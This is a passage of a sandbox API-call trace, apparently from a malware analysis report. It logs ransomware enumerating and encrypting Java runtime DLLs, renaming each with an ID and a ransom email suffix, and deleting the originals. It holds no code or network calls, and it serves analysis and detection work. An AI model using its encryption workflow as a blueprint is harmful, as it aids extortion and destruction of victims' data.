(lpString=".xls") returned 4 [0198.525] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.525] lstrlenW (lpString=".xlsx") returned 5 [0198.525] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0198.526] lstrlenW (lpString=".ppt") returned 4 [0198.526] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.526] lstrlenW (lpString=".zip") returned 4 [0198.526] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.526] lstrlenW (lpString=".rar") returned 4 [0198.526] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.526] lstrlenW (lpString=".bz2") returned 4 [0198.526] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.526] lstrlenW (lpString=".7z") returned 3 [0198.526] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.526] lstrlenW (lpString=".dbf") returned 4 [0198.526] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.526] lstrlenW (lpString=".1cd") returned 4 [0198.526] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.526] lstrlenW (lpString=".jpg") returned 4 [0198.526] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.526] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.526] lstrlenW (lpString="msvcr100.dll") returned 12 [0198.526] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0198.527] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=829264) returned 1 [0198.527] CloseHandle (hObject=0x38c) returned 1 [0198.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll")) returned 0x20 [0198.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.527] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0198.528] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.528] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.528] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0198.528] GetLastError () returned 0x0 [0198.528] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0xca750, lpOverlapped=0x0) returned 1 [0198.577] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xca760, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xca760, lpOverlapped=0x0) returned 1 [0198.691] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.691] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.691] SetEndOfFile (hFile=0x39c) returned 1 [0198.691] CloseHandle (hObject=0x39c) returned 1 [0198.691] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.691] SetEndOfFile (hFile=0x38c) returned 1 [0198.699] CloseHandle (hObject=0x38c) returned 1 [0198.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.292] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll")) returned 1 [0199.292] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.292] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.292] lstrlenW (lpString=".doc") returned 4 [0199.292] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.292] lstrlenW (lpString=".docx") returned 5 [0199.292] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0199.292] lstrlenW (lpString=".pdf") returned 4 [0199.292] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.292] lstrlenW (lpString=".xls") returned 4 [0199.292] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.292] lstrlenW (lpString=".xlsx") returned 5 [0199.292] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0199.292] lstrlenW (lpString=".ppt") returned 4 [0199.292] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.293] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.293] lstrlenW (lpString=".zip") returned 4 [0199.293] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.293] lstrlenW (lpString=".rar") returned 4 [0199.293] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.293] lstrlenW (lpString=".bz2") returned 4 [0199.293] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.293] lstrlenW (lpString=".7z") returned 3 [0199.293] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.293] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.293] lstrlenW (lpString=".dbf") returned 4 [0199.293] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.293] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.293] lstrlenW (lpString=".1cd") returned 4 [0199.293] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.293] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.293] lstrlenW (lpString=".jpg") returned 4 [0199.293] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.293] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.293] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.293] lstrlenW (lpString=".doc") returned 4 [0199.293] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.293] lstrlenW (lpString=".docx") returned 5 [0199.293] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0199.293] lstrlenW (lpString=".pdf") returned 4 [0199.293] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.293] lstrlenW (lpString=".xls") returned 4 [0199.293] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.293] lstrlenW (lpString=".xlsx") returned 5 [0199.294] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0199.294] lstrlenW (lpString=".ppt") returned 4 [0199.294] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.294] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.294] lstrlenW (lpString=".zip") returned 4 [0199.294] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.294] lstrlenW (lpString=".rar") returned 4 [0199.294] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.294] lstrlenW (lpString=".bz2") returned 4 [0199.294] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.294] lstrlenW (lpString=".7z") returned 3 [0199.294] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.294] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.294] lstrlenW (lpString=".dbf") returned 4 [0199.294] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.294] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.294] lstrlenW (lpString=".1cd") returned 4 [0199.294] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.294] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 59 [0199.294] lstrlenW (lpString=".jpg") returned 4 [0199.294] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.294] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0199.294] lstrlenW (lpString="jvm.dll") returned 7 [0199.294] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0199.295] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=8809536) returned 1 [0199.295] CloseHandle (hObject=0x33c) returned 1 [0199.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll")) returned 0x20 [0199.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.295] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0199.296] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0199.297] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc64 | out: lpNewFilePointer=0x0) returned 1 [0199.297] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0199.297] ReadFile (in: hFile=0x33c, lpBuffer=0x4049058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x4049058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0199.412] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x2ccec0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0199.412] ReadFile (in: hFile=0x33c, lpBuffer=0x4089058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x4089058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0199.547] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x361fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0199.547] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x826c40, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0199.547] ReadFile (in: hFile=0x33c, lpBuffer=0x40c9058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x40c9058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0199.652] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.652] WriteFile (in: hFile=0x33c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xc00fa, lpNumberOfBytesWritten=0x361fca8, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fca8*=0xc00fa, lpOverlapped=0x0) returned 1 [0199.667] SetEndOfFile (hFile=0x33c) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40000) returned 0x44450c0 [0199.669] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0199.669] WriteFile (in: hFile=0x33c, lpBuffer=0x44450c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44450c0*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0199.670] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x2ccec0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0199.670] WriteFile (in: hFile=0x33c, lpBuffer=0x44450c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44450c0*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0200.180] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x826c40, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0200.182] WriteFile (in: hFile=0x33c, lpBuffer=0x44450c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44450c0*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0200.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0200.187] CloseHandle (hObject=0x33c) returned 1 [0200.453] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0200.453] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.453] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.453] lstrlenW (lpString=".doc") returned 4 [0200.453] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.453] lstrlenW (lpString=".docx") returned 5 [0200.453] lstrcmpiW (lpString1=".docx", lpString2="m.dll") returned -1 [0200.453] lstrlenW (lpString=".pdf") returned 4 [0200.453] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.453] lstrlenW (lpString=".xls") returned 4 [0200.453] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.453] lstrlenW (lpString=".xlsx") returned 5 [0200.454] lstrcmpiW (lpString1=".xlsx", lpString2="m.dll") returned -1 [0200.454] lstrlenW (lpString=".ppt") returned 4 [0200.454] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.454] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.454] lstrlenW (lpString=".zip") returned 4 [0200.454] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.454] lstrlenW (lpString=".rar") returned 4 [0200.454] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.454] lstrlenW (lpString=".bz2") returned 4 [0200.454] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.454] lstrlenW (lpString=".7z") returned 3 [0200.454] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.454] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.454] lstrlenW (lpString=".dbf") returned 4 [0200.454] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.454] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.454] lstrlenW (lpString=".1cd") returned 4 [0200.454] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.454] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.454] lstrlenW (lpString=".jpg") returned 4 [0200.454] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.454] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.454] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.454] lstrlenW (lpString=".doc") returned 4 [0200.454] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.454] lstrlenW (lpString=".docx") returned 5 [0200.454] lstrcmpiW (lpString1=".docx", lpString2="m.dll") returned -1 [0200.454] lstrlenW (lpString=".pdf") returned 4 [0200.454] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.455] lstrlenW (lpString=".xls") returned 4 [0200.455] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.455] lstrlenW (lpString=".xlsx") returned 5 [0200.455] lstrcmpiW (lpString1=".xlsx", lpString2="m.dll") returned -1 [0200.455] lstrlenW (lpString=".ppt") returned 4 [0200.455] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.455] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.455] lstrlenW (lpString=".zip") returned 4 [0200.455] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.455] lstrlenW (lpString=".rar") returned 4 [0200.455] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.455] lstrlenW (lpString=".bz2") returned 4 [0200.455] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.455] lstrlenW (lpString=".7z") returned 3 [0200.455] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.455] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.455] lstrlenW (lpString=".dbf") returned 4 [0200.455] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.455] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.455] lstrlenW (lpString=".1cd") returned 4 [0200.455] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.455] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 53 [0200.455] lstrlenW (lpString=".jpg") returned 4 [0200.455] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.455] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0200.456] lstrlenW (lpString="unpack.dll") returned 10 [0200.456] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0200.480] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=79936) returned 1 [0200.480] CloseHandle (hObject=0x338) returned 1 [0200.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll")) returned 0x20 [0200.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0200.480] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0200.481] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.481] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.481] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0200.481] GetLastError () returned 0x0 [0200.481] ReadFile (in: hFile=0x338, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x13840, lpOverlapped=0x0) returned 1 [0200.648] WriteFile (in: hFile=0x380, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x13850, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x13850, lpOverlapped=0x0) returned 1 [0200.650] ReadFile (in: hFile=0x338, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.650] WriteFile (in: hFile=0x380, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe8, lpOverlapped=0x0) returned 1 [0200.651] SetEndOfFile (hFile=0x380) returned 1 [0200.651] CloseHandle (hObject=0x380) returned 1 [0200.651] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.651] SetEndOfFile (hFile=0x338) returned 1 [0200.652] CloseHandle (hObject=0x338) returned 1 [0200.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0200.653] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll")) returned 1 [0200.653] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.653] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.653] lstrlenW (lpString=".doc") returned 4 [0200.653] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.653] lstrlenW (lpString=".docx") returned 5 [0200.653] lstrcmpiW (lpString1=".docx", lpString2="k.dll") returned -1 [0200.653] lstrlenW (lpString=".pdf") returned 4 [0200.653] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.653] lstrlenW (lpString=".xls") returned 4 [0200.653] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.653] lstrlenW (lpString=".xlsx") returned 5 [0200.653] lstrcmpiW (lpString1=".xlsx", lpString2="k.dll") returned -1 [0200.653] lstrlenW (lpString=".ppt") returned 4 [0200.653] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.653] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.653] lstrlenW (lpString=".zip") returned 4 [0200.653] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.653] lstrlenW (lpString=".rar") returned 4 [0200.654] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.654] lstrlenW (lpString=".bz2") returned 4 [0200.654] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.654] lstrlenW (lpString=".7z") returned 3 [0200.654] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.654] lstrlenW (lpString=".dbf") returned 4 [0200.654] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.654] lstrlenW (lpString=".1cd") returned 4 [0200.654] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.654] lstrlenW (lpString=".jpg") returned 4 [0200.654] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.654] lstrlenW (lpString=".doc") returned 4 